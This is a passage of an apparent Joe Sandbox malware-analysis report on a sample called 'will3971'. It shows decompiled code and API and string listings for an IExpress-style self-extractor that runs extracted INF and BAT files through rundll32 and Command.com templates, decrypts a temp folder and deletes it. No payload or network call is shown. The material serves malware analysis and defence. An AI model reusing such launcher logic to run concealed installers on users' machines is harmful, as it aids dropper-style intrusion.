0x002f3d21
0x002f3d26
0x00000000
0x002f3c4f
0x002f3c56
0x002f3c60
0x002f3c65
0x002f3c77
0x002f3c78
0x002f3c7c
0x002f3c7e
0x002f3c82
0x002f3c82
0x00000000
0x002f3c7c
0x002f3c67
0x002f3c69
0x002f3c6d
0x00000000
0x002f3c58
0x002f3c58
0x002f3c6e
0x002f3c6e
0x002f3c87
0x002f3c89
0x002f3d4d
0x002f3d4f
0x002f3d50
0x002f3d52
0x002f3d9e
0x002f3da8
0x002f3daf
0x002f3db4
0x002f3db6
0x002f3f4d
0x002f3f4d
0x002f3f4f
0x002f3f56
0x002f3f57
0x002f3f58
0x002f3f63
0x002f3f63
0x002f3dbc
0x002f3dc0
0x002f3dc2
0x002f3de6
0x002f3de6
0x002f3de8
0x002f3f0b
0x002f3f0b
0x002f3f0f
0x002f3f13
0x002f3f15
0x002f3f1a
0x002f3f1c
0x002f3f46
0x002f3f47
0x00000000
0x002f3f47
0x002f3f1e
0x002f3f1f
0x002f3f25
0x002f3f26
0x002f3f2a
0x002f3f2d
0x002f3fd9
0x002f3fd9
0x002f3fda
0x002f3fda
0x002f3fe1
0x002f3fe3
0x002f3fe3
0x002f3fe8
0x00000000
0x002f3fe8
0x002f3f33
0x002f3f37
0x00000000
0x002f3f37
0x002f3dee
0x002f3dee
0x002f3df5
0x002f3fad
0x002f3fb9
0x002f3fc2
0x002f3fc8
0x00000000
0x002f3fc8
0x002f3dfb
0x002f3dfd
0x00000000
0x00000000
0x002f3e03
0x002f3e0a
0x00000000
0x00000000
0x002f3e15
0x002f3e17
0x002f3e19
0x002f3f94
0x002f3fa4
0x002f3f7c
0x002f3f80
0x002f3f8b
0x00000000
0x002f3f8b
0x002f3e2c
0x002f3e30
0x002f3e34
0x002f3e36
0x002f3f69
0x002f3f6e
0x002f3f70
0x002f3f76
0x00000000
0x002f3f76
0x002f3e3c
0x002f3e43
0x002f3e47
0x002f3e52
0x002f3e56
0x002f3e5c
0x002f3e61
0x002f3e68
0x002f3e70
0x002f3e74
0x002f3e7c
0x002f3e80
0x002f3e82
0x002f3e82
0x002f3e87
0x002f3e87
0x002f3e8b
0x002f3e91
0x002f3e94
0x002f3e96
0x002f3e96
0x002f3e9b
0x002f3e9b
0x002f3e9f
0x002f3ea2
0x002f3ea4
0x002f3ea4
0x002f3ea9
0x002f3ea9
0x002f3ead
0x002f3eb3
0x002f3eb6
0x002f3eb8
0x002f3eb8
0x002f3ebd
0x002f3ebd
0x002f3ec1
0x002f3ec3
0x002f3ec5
0x002f3ec5
0x002f3eca
0x002f3eca
0x002f3ece
0x002f3ed5
0x002f3ed9
0x002f3ee0
0x002f3ee6
0x002f3eea
0x002f3eec
0x002f3eee
0x002f3ef3
0x002f3ef3
0x002f3ef5
0x002f3efa
0x002f3efb
0x002f3efd
0x002f3f40
0x00000000
0x002f3eff
0x002f3eff
0x002f3f05
0x00000000
0x002f3f05
0x002f3efd
0x002f3dc7
0x002f3dce
0x00000000
0x00000000
0x002f3dd0
0x002f3dd7
0x00000000
0x00000000
0x002f3dd9
0x002f3ddb
0x00000000
0x00000000
0x002f3ddd
0x002f3de1
0x00000000
0x002f3de1
0x002f3d59
0x002f3d65
0x002f3d6a
0x002f3d6c
0x00000000
0x00000000
0x002f3d6e
0x002f3d75
0x00000000
0x00000000
0x002f3d8f
0x002f3d96
0x002f3d98
0x00000000
0x00000000
0x00000000
0x002f3d98
0x002f3c8f
0x002f3c98
0x002f3cf1
0x002f3cf3
0x00000000
0x00000000
0x002f3cfe
0x002f3d11
0x00000000
0x00000000
0x00000000
0x002f3d11
0x002f3c9c
0x002f3ca5
0x002f3ca7
0x00000000
0x00000000
0x002f3cad
0x002f3cb2
0x002f3cb7
0x002f3cc5
0x00000000
0x00000000
0x002f3ce8
0x002f3cec
0x002f3ced
0x002f3ced
0x00000000
0x002f3ce8
0x002f3c9e
0x00000000
0x002f3c9e
0x002f3c56
0x002f3d35
0x002f3d35
0x002f3d3c
0x002f3d48
0x00000000
0x002f3d48
0x002f3c03
0x002f3be2
0x002f3be7
0x002f3bee
0x00000000
0x00000000
0x00000000
0x00000000

APIs

memset.MSVCRT ref: 002F3C11
CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 002F3CDC

Part of subcall function 002F468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 002F46A0
Part of subcall function 002F468F: SizeofResource.KERNEL32(00000000,00000000,?,002F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002F46A9
Part of subcall function 002F468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 002F46C3
Part of subcall function 002F468F: LoadResource.KERNEL32(00000000,00000000,?,002F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002F46CC
Part of subcall function 002F468F: LockResource.KERNEL32(00000000,?,002F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002F46D3
Part of subcall function 002F468F: memcpy_s.MSVCRT ref: 002F46E5
Part of subcall function 002F468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 002F46EF

CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,002F8C42), ref: 002F3D8F
GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 002F3E26
FreeLibrary.KERNEL32(00000000,?,002F8C42), ref: 002F3EFF
LocalFree.KERNEL32(?,?,?,?,002F8C42), ref: 002F3F1F
FreeLibrary.KERNEL32(00000000,?,002F8C42), ref: 002F3F40
LocalFree.KERNEL32(?,?,?,?,002F8C42), ref: 002F3F47
FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,002F8C42), ref: 002F3F76
LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,002F8C42), ref: 002F3F80
LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,002F8C42), ref: 002F3FC2

Strings

DoInfInstall, xrefs: 002F3E1F, 002F3E24, 002F3F68
advpack.dll, xrefs: 002F3F9D
SHOWWINDOW, xrefs: 002F3C34
REBOOT, xrefs: 002F3BE2
USRQCMD, xrefs: 002F3CAD
D, xrefs: 002F3C19
POSTRUNPROGRAM, xrefs: 002F3D60
RUNPROGRAM, xrefs: 002F3D05
ADMQCMD, xrefs: 002F3C9E
<None>, xrefs: 002F3CC9, 002F3D7D
C:\Users\user\AppData\Local\Temp\IXP003.TMP\, xrefs: 002F3E74
lega, xrefs: 002F3E68

Memory Dump Source

Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd

Similarity

API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP003.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$lega
API String ID: 1032054927-3474760064
Opcode ID: b64bd4f55be0325e33c1af09d02b64250c26fc7eff2ddf7ce575e5525d5f56ec
Instruction ID: aee299b8820d0aae687137d78b6fc0b16542d047a5f6710b9de3c23db2c07198
Opcode Fuzzy Hash: b64bd4f55be0325e33c1af09d02b64250c26fc7eff2ddf7ce575e5525d5f56ec
Instruction Fuzzy Hash: D3B1C47052430A9BE720DF24D949B7BF6E4EB857E0F100A3EFB89D6190DB718964CB52

Uniqueness

Uniqueness Score: -1.00%

Function 002F1AE8 Relevance: 38.8, APIs: 10, Strings: 12, Instructions: 291
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E002F1AE8(long __ecx, CHAR** _a4, int* _a8) {
				signed int _v8;
				char _v268;
				char _v527;
				char _v528;
				char _v1552;
				CHAR* _v1556;
				int* _v1560;
				CHAR** _v1564;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t48;
				CHAR* _t53;
				CHAR* _t54;
				char* _t57;
				char* _t58;
				CHAR* _t60;
				void* _t62;
				signed char _t65;
				intOrPtr _t76;
				intOrPtr _t77;
				unsigned int _t85;
				CHAR* _t90;
				CHAR* _t92;
				char _t105;
				char _t106;
				CHAR** _t111;
				CHAR* _t115;
				intOrPtr* _t125;
				void* _t126;
				CHAR* _t132;
				CHAR* _t135;
				void* _t138;
				void* _t139;
				void* _t145;
				intOrPtr* _t146;
				char* _t148;
				CHAR* _t151;
				void* _t152;
				CHAR* _t155;
				CHAR* _t156;
				void* _t157;
				signed int _t158;

				_t48 =  *0x2f8004; // 0x404cc811
				_v8 = _t48 ^ _t158;
				_t108 = __ecx;
				_v1564 = _a4;
				_v1560 = _a8;
				E002F1680( &_v528, 0x104, __ecx);
				if(_v528 != 0x22) {
					_t135 = " ";
					_t53 =  &_v528;
				} else {
					_t135 = "\"";
					_t53 =  &_v527;
				}
				_t111 =  &_v1556;
				_v1556 = _t53;
				_t54 = E002F1A84(_t111, _t135);
				_t156 = _v1556;
				_t151 = _t54;
				if(_t156 == 0) {
					L12:
					_push(_t111);
					E002F1781( &_v268, 0x104, _t111, "C:\Users\alfons\AppData\Local\Temp\IXP003.TMP\");
					E002F658A( &_v268, 0x104, _t156);
					goto L13;
				} else {
					_t132 = _t156;
					_t148 =  &(_t132[1]);
					do {
						_t105 =  *_t132;
						_t132 =  &(_t132[1]);
					} while (_t105 != 0);
					_t111 = _t132 - _t148;
					if(_t111 < 3) {
						goto L12;
					}
					_t106 = _t156[1];
					if(_t106 != 0x3a || _t156[2] != 0x5c) {
						if( *_t156 != 0x5c || _t106 != 0x5c) {
							goto L12;
						} else {
							goto L11;
						}
					} else {
						L11:
						E002F1680( &_v268, 0x104, _t156);
						L13:
						_t138 = 0x2e;
						_t57 = E002F66C8(_t156, _t138);
						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
							_t139 = 0x2e;
							_t115 = _t156;
							_t58 = E002F66C8(_t115, _t139);
							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
								_t156 = LocalAlloc(0x40, 0x400);
								if(_t156 == 0) {
									goto L43;
								}
								_t65 = GetFileAttributesA( &_v268); // executed
								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
									E002F1680( &_v1552, 0x400, _t108);
								} else {
									_push(_t115);
									_t108 = 0x400;
									E002F1781( &_v1552, 0x400, _t115,  &_v268);
									if(_t151 != 0 &&  *_t151 != 0) {
										E002F16B3( &_v1552, 0x400, " ");
										E002F16B3( &_v1552, 0x400, _t151);
									}
								}
								_t140 = _t156;
								 *_t156 = 0;
								E002F2AAC( &_v1552, _t156, _t156);
								goto L53;
							} else {
								_t108 = "Command.com /c %s";
								_t125 = "Command.com /c %s";
								_t145 = _t125 + 1;
								do {
									_t76 =  *_t125;
									_t125 = _t125 + 1;
								} while (_t76 != 0);
								_t126 = _t125 - _t145;
								_t146 =  &_v268;
								_t157 = _t146 + 1;
								do {
									_t77 =  *_t146;
									_t146 = _t146 + 1;
								} while (_t77 != 0);
								_t140 = _t146 - _t157;
								_t154 = _t126 + 8 + _t146 - _t157;
								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
								if(_t156 != 0) {
									E002F171E(_t156, _t154, "Command.com /c %s",  &_v268);
									goto L53;
								}
								goto L43;
							}
						} else {
							_t85 = GetFileAttributesA( &_v268);
							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
								_t140 = 0x525;
								_push(0);
								_push(0x10);
								_push(0);
								_t60 =  &_v268;
								goto L35;
							} else {
								_t140 = "[";
								_v1556 = _t151;
								_t90 = E002F1A84( &_v1556, "[");
								if(_t90 != 0) {
									if( *_t90 != 0) {
										_v1556 = _t90;
									}
									_t140 = "]";
									E002F1A84( &_v1556, "]");
								}
								_t156 = LocalAlloc(0x40, 0x200);
								if(_t156 == 0) {
									L43:
									_t60 = 0;
									_t140 = 0x4b5;
									_push(0);
									_push(0x10);
									_push(0);
									L35:
									_push(_t60);
									E002F44B9(0, _t140);
									_t62 = 0;
									goto L54;
								} else {
									_t155 = _v1556;
									_t92 = _t155;
									if( *_t155 == 0) {
										_t92 = "DefaultInstall";
									}
									 *0x2f9120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
									 *_v1560 = 1;
									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0x2f1140, _t156, 8,  &_v268) == 0) {
										 *0x2f9a34 =  *0x2f9a34 & 0xfffffffb;
										if( *0x2f9a40 != 0) {
											_t108 = "setupapi.dll";
										} else {
											_t108 = "setupx.dll";
											GetShortPathNameA( &_v268,  &_v268, 0x104);
										}
										if( *_t155 == 0) {
											_t155 = "DefaultInstall";
										}
										_push( &_v268);
										_push(_t155);
										E002F171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
									} else {
										 *0x2f9a34 =  *0x2f9a34 | 0x00000004;
										if( *_t155 == 0) {
											_t155 = "DefaultInstall";
										}
										E002F1680(_t108, 0x104, _t155);
										_t140 = 0x200;
										E002F1680(_t156, 0x200,  &_v268);
									}
									L53:
									_t62 = 1;
									 *_v1564 = _t156;
									L54:
									_pop(_t152);
									return E002F6CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
								}
							}
						}
					}
				}
			}

0x002f1af3
0x002f1afa
0x002f1b07
0x002f1b09
0x002f1b1a
0x002f1b20
0x002f1b2c
0x002f1b3b
0x002f1b40
0x002f1b2e
0x002f1b2e
0x002f1b33
0x002f1b33
0x002f1b46
0x002f1b4c
0x002f1b52
0x002f1b57
0x002f1b5d
0x002f1b61
0x002f1b9f
0x002f1b9f
0x002f1bb1
0x002f1bc2
0x00000000
0x002f1b63
0x002f1b63
0x002f1b65
0x002f1b68
0x002f1b68
0x002f1b6a
0x002f1b6b
0x002f1b6f
0x002f1b74
0x00000000
0x00000000
0x002f1b76
0x002f1b7b
0x002f1b86
0x00000000
0x00000000
0x00000000
0x00000000
0x002f1b8c
0x002f1b8c
0x002f1b98
0x002f1bc7
0x002f1bc9
0x002f1bcc
0x002f1bd3
0x002f1d75
0x002f1d76
0x002f1d78
0x002f1d7f
0x002f1e05
0x002f1e09
0x00000000
0x00000000
0x002f1e12
0x002f1e1b
0x002f1e73
0x002f1e21
0x002f1e21
0x002f1e28
0x002f1e37
0x002f1e3e
0x002f1e52
0x002f1e60
0x002f1e60
0x002f1e3e
0x002f1e79
0x002f1e7b
0x002f1e84
0x00000000
0x002f1d9b
0x002f1d9b
0x002f1da0
0x002f1da2
0x002f1da5
0x002f1da5
0x002f1da7
0x002f1da8
0x002f1dac
0x002f1dae
0x002f1db4
0x002f1db7
0x002f1db7
0x002f1db9
0x002f1dba
0x002f1dbe
0x002f1dc3
0x002f1dce
0x002f1dd2
0x002f1deb
0x00000000
0x002f1df0
0x00000000
0x002f1dd2
0x002f1bf7
0x002f1bfe
0x002f1c07
0x002f1d55
0x002f1d5a
0x002f1d5b
0x002f1d5d
0x002f1d5e
0x00000000
0x002f1c1b
0x002f1c1b
0x002f1c20
0x002f1c2c
0x002f1c33
0x002f1c38
0x002f1c3a
0x002f1c3a
0x002f1c40
0x002f1c4b
0x002f1c4b
0x002f1c5d
0x002f1c61
0x002f1dd4
0x002f1dd4
0x002f1dd6
0x002f1ddb
0x002f1ddc
0x002f1dde
0x002f1d64
0x002f1d64
0x002f1d67
0x002f1d6c
0x00000000
0x002f1c67
0x002f1c67
0x002f1c6d
0x002f1c72
0x002f1c74
0x002f1c74
0x002f1c8e
0x002f1c99
0x002f1cc0
0x002f1cf8
0x002f1d07
0x002f1d23
0x002f1d09
0x002f1d14
0x002f1d1b
0x002f1d1b
0x002f1d2b
0x002f1d2d
0x002f1d2d
0x002f1d38
0x002f1d39
0x002f1d46
0x002f1cc2
0x002f1cc2
0x002f1ccc
0x002f1cce
0x002f1cce
0x002f1cdb
0x002f1ce6
0x002f1cee
0x002f1cee
0x002f1e89
0x002f1e91
0x002f1e92
0x002f1e94
0x002f1e97
0x002f1ea4
0x002f1ea4
0x002f1c61
0x002f1c07
0x002f1bd3
0x002f1b7b

APIs

CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,?,00000000,00000001,00000000), ref: 002F1BE7
GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,?,00000000,00000001,00000000), ref: 002F1BFE
LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,?,00000000,00000001,00000000), ref: 002F1C57
GetPrivateProfileIntA.KERNEL32 ref: 002F1C88
GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,002F1140,00000000,00000008,?), ref: 002F1CB8
GetShortPathNameA.KERNEL32 ref: 002F1D1B

Part of subcall function 002F44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 002F4518
Part of subcall function 002F44B9: MessageBoxA.USER32(?,?,lega,00010010), ref: 002F4554

Strings

Reboot, xrefs: 002F1C82
Command.com /c %s, xrefs: 002F1D9B, 002F1DE8
Version, xrefs: 002F1CB3
DefaultInstall, xrefs: 002F1C74, 002F1C87, 002F1CCE, 002F1CD3, 002F1D2D, 002F1D39
.INF, xrefs: 002F1BDB
rundll32.exe %s,InstallHinfSection %s 128 %s, xrefs: 002F1D3B
AdvancedINF, xrefs: 002F1CAE
", xrefs: 002F1B25
.BAT, xrefs: 002F1D83
setupx.dll, xrefs: 002F1D14
setupapi.dll, xrefs: 002F1D23, 002F1D3A
C:\Users\user\AppData\Local\Temp\IXP003.TMP\, xrefs: 002F1BA0

Memory Dump Source

Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd

Similarity

API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP003.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
API String ID: 383838535-506080820
Opcode ID: e2efa9c3e24b499280ad5b193684502c14699435889f2f7e36e47bd17f91920d
Instruction ID: 5817a00a8ac98c1542d80d346f6f3123114462d67015af54fc8998837b5cf2ce
Opcode Fuzzy Hash: e2efa9c3e24b499280ad5b193684502c14699435889f2f7e36e47bd17f91920d
Instruction Fuzzy Hash: 75A10470A2021DDBEB209F24DC44FFAF7699B513A0F9402B5E759A32C1DBB09DB5CA50

Uniqueness

Uniqueness Score: -1.00%

Function 002F2F1D Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 120
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E002F2F1D(void* __ecx, int __edx) {
				signed int _v8;
				char _v272;
				_Unknown_base(*)()* _v276;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t9;
				void* _t11;
				struct HWND__* _t12;
				void* _t14;
				int _t21;
				signed int _t22;
				signed int _t25;
				intOrPtr* _t26;
				signed int _t27;
				void* _t30;
				_Unknown_base(*)()* _t31;
				void* _t34;
				struct HINSTANCE__* _t36;
				intOrPtr _t41;
				intOrPtr* _t44;
				signed int _t46;
				int _t47;
				void* _t58;
				void* _t59;

				_t43 = __edx;
				_t9 =  *0x2f8004; // 0x404cc811
				_v8 = _t9 ^ _t46;
				if( *0x2f8a38 != 0) {
					L5:
					_t11 = E002F5164(_t52);
					_t53 = _t11;
					if(_t11 == 0) {
						L16:
						_t12 = 0;
						L17:
						return E002F6CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
					}
					_t14 = E002F55A0(_t53); // executed
					if(_t14 == 0) {
						goto L16;
					} else {
						_t45 = 0x105;
						GetSystemDirectoryA( &_v272, 0x105);
						_t43 = 0x105;
						_t40 =  &_v272;
						E002F658A( &_v272, 0x105, "advapi32.dll");
						_t36 = LoadLibraryA( &_v272);
						_t44 = 0;
						if(_t36 != 0) {
							_t31 = GetProcAddress(_t36, "DecryptFileA");
							_v276 = _t31;
							if(_t31 != 0) {
								_t45 = _t47;
								_t40 = _t31;
								 *0x2fa288("C:\Users\alfons\AppData\Local\Temp\IXP003.TMP\", 0); // executed
								_v276();
								if(_t47 != _t47) {
									_t40 = 4;
									asm("int 0x29");
								}
							}
						}
						FreeLibrary(_t36);
						_t58 =  *0x2f8a24 - _t44; // 0x0
						if(_t58 != 0) {
							L14:
							_t21 = SetCurrentDirectoryA("C:\Users\alfons\AppData\Local\Temp\IXP003.TMP\"); // executed
							if(_t21 != 0) {
								__eflags =  *0x2f8a2c - _t44; // 0x0
								if(__eflags != 0) {
									L20:
									__eflags =  *0x2f8d48 & 0x000000c0;
									if(( *0x2f8d48 & 0x000000c0) == 0) {
										_t41 =  *0x2f9a40; // 0x3, executed
										_t26 = E002F256D(_t41); // executed
										_t44 = _t26;
									}
									_t22 =  *0x2f8a24; // 0x0
									 *0x2f9a44 = _t44;
									__eflags = _t22;
									if(_t22 != 0) {
										L26:
										__eflags =  *0x2f8a38;
										if( *0x2f8a38 == 0) {
											__eflags = _t22;
											if(__eflags == 0) {
												E002F4169(__eflags);
											}
										}
										_t12 = 1;
										goto L17;
									} else {
										__eflags =  *0x2f9a30 - _t22; // 0x0
										if(__eflags != 0) {
											goto L26;
										}
										_t25 = E002F3BA2(); // executed
										__eflags = _t25;
										if(_t25 == 0) {
											goto L16;
										}
										_t22 =  *0x2f8a24; // 0x0
										goto L26;
									}
								}
								_t27 = E002F3B26(_t40, _t44);
								__eflags = _t27;
								if(_t27 == 0) {
									goto L16;
								}
								goto L20;
							}
							_t43 = 0x4bc;
							E002F44B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
							 *0x2f9124 = E002F6285();
							goto L16;
						}
						_t59 =  *0x2f9a30 - _t44; // 0x0
						if(_t59 != 0) {
							goto L14;
						}
						_t30 = E002F621E(); // executed
						if(_t30 == 0) {
							goto L16;
						}
						goto L14;
					}
				}
				_t49 =  *0x2f8a24;
				if( *0x2f8a24 != 0) {
					L4:
					_t34 = E002F3A3F(_t51);
					_t52 = _t34;
					if(_t34 == 0) {
						goto L16;
					}
					goto L5;
				}
				if(E002F51E5(_t49) == 0) {
					goto L16;
				}
				_t51 =  *0x2f8a38;
				if( *0x2f8a38 != 0) {
					goto L5;
				}
				goto L4;
			}

0x002f2f1d
0x002f2f28
0x002f2f2f
0x002f2f3d
0x002f2f6c
0x002f2f6c
0x002f2f71
0x002f2f73
0x002f3041
0x002f3041
0x002f3043
0x002f3053
0x002f3053
0x002f2f79
0x002f2f80
0x00000000
0x002f2f86
0x002f2f86
0x002f2f93
0x002f2f9e
0x002f2fa0
0x002f2fa6
0x002f2fb8
0x002f2fba
0x002f2fbe
0x002f2fc6
0x002f2fcc
0x002f2fd4
0x002f2fd6
0x002f2fd8
0x002f2fe0
0x002f2fe6
0x002f2fee
0x002f2ff0
0x002f2ff5
0x002f2ff5
0x002f2fee
0x002f2fd4
0x002f2ff8
0x002f2ffe
0x002f3004
0x002f3017
0x002f301c
0x002f3024
0x002f3054
0x002f305a
0x002f3065
0x002f3065
0x002f306c
0x002f306e
0x002f3075
0x002f307a
0x002f307a
0x002f307c
0x002f3081
0x002f3087
0x002f3089
0x002f30a1
0x002f30a1
0x002f30a9
0x002f30ab
0x002f30ad
0x002f30af
0x002f30af
0x002f30ad
0x002f30b6
0x00000000
0x002f308b
0x002f308b
0x002f3091
0x00000000
0x00000000
0x002f3093
0x002f3098
0x002f309a
0x00000000
0x00000000
0x002f309c
0x00000000
0x002f309c
0x002f3089
0x002f305c
0x002f3061
0x002f3063
0x00000000
0x00000000
0x00000000
0x002f3063
0x002f302b
0x002f3032
0x002f303c
0x00000000
0x002f303c
0x002f3006
0x002f300c
0x00000000
0x00000000
0x002f300e
0x002f3015
0x00000000
0x00000000
0x00000000
0x002f3015
0x002f2f80
0x002f2f3f
0x002f2f46
0x002f2f5f
0x002f2f5f
0x002f2f64
0x002f2f66
0x00000000
0x00000000
0x00000000
0x002f2f66
0x002f2f4f
0x00000000
0x00000000
0x002f2f55
0x002f2f5d
0x00000000
0x00000000
0x00000000

APIs

GetSystemDirectoryA.KERNEL32 ref: 002F2F93
LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 002F2FB2
GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 002F2FC6
DecryptFileA.ADVAPI32 ref: 002F2FE6
FreeLibrary.KERNEL32(00000000), ref: 002F2FF8
SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP003.TMP\), ref: 002F301C

Part of subcall function 002F51E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,002F2F4D,?,00000002,00000000), ref: 002F5201

Strings

DecryptFileA, xrefs: 002F2FC0
advapi32.dll, xrefs: 002F2F99
C:\Users\user\AppData\Local\Temp\IXP003.TMP\, xrefs: 002F2FDB, 002F3017

Memory Dump Source

Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd

Similarity

API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$DecryptFileA$advapi32.dll
API String ID: 2126469477-1932822326
Opcode ID: c3b60d85ccceb8cd884fe302105b808e3e8123333dbeb15b9abea21153d27227
Instruction ID: 3be6dab47c288a84ce98312bc184ca8e19bceb7cac77f78633c64953dbb6de9b
Opcode Fuzzy Hash: c3b60d85ccceb8cd884fe302105b808e3e8123333dbeb15b9abea21153d27227
Instruction Fuzzy Hash: 5A41823063020E9ADB20EF71BD49776F6A8DB557E0F10017AEB45C2591EF748EA4CE51

Uniqueness

Uniqueness Score: -1.00%

Function 002F2390 Relevance: 12.1, APIs: 8, Instructions: 93
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E002F2390(CHAR* __ecx) {
				signed int _v8;
				char _v276;
				char _v280;
				char _v284;
				struct _WIN32_FIND_DATAA _v596;
				struct _WIN32_FIND_DATAA _v604;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				int _t36;
				void* _t46;
				void* _t62;
				void* _t63;
				CHAR* _t65;
				void* _t66;
				signed int _t67;
				signed int _t69;

				_t69 = (_t67 & 0xfffffff8) - 0x254;
				_t21 =  *0x2f8004; // 0x404cc811
				_t22 = _t21 ^ _t69;
				_v8 = _t21 ^ _t69;
				_t65 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
					L10:
					_pop(_t62);
					_pop(_t66);
					_pop(_t46);
					return E002F6CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
				} else {
					E002F1680( &_v276, 0x104, __ecx);
					_t58 = 0x104;
					E002F16B3( &_v280, 0x104, "*");
					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
					_t63 = _t22;
					if(_t63 == 0xffffffff) {
						goto L10;
					} else {
						goto L3;
					}
					do {
						L3:
						_t58 = 0x104;
						E002F1680( &_v276, 0x104, _t65);
						if((_v604.ftCreationTime & 0x00000010) == 0) {
							_t58 = 0x104;
							E002F16B3( &_v276, 0x104,  &(_v596.dwReserved1));
							SetFileAttributesA( &_v280, 0x80);
							DeleteFileA( &_v280);
						} else {
							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
								E002F16B3( &_v276, 0x104,  &(_v596.cFileName));
								_t58 = 0x104;
								E002F658A( &_v280, 0x104, 0x2f1140);
								E002F2390( &_v284);
							}
						}
						_t36 = FindNextFileA(_t63,  &_v596); // executed
					} while (_t36 != 0);
					FindClose(_t63); // executed
					_t22 = RemoveDirectoryA(_t65); // executed
					goto L10;
				}
			}

0x002f2398
0x002f239e
0x002f23a3
0x002f23a5
0x002f23ae
0x002f23b3
0x002f24cb
0x002f24d2
0x002f24d3
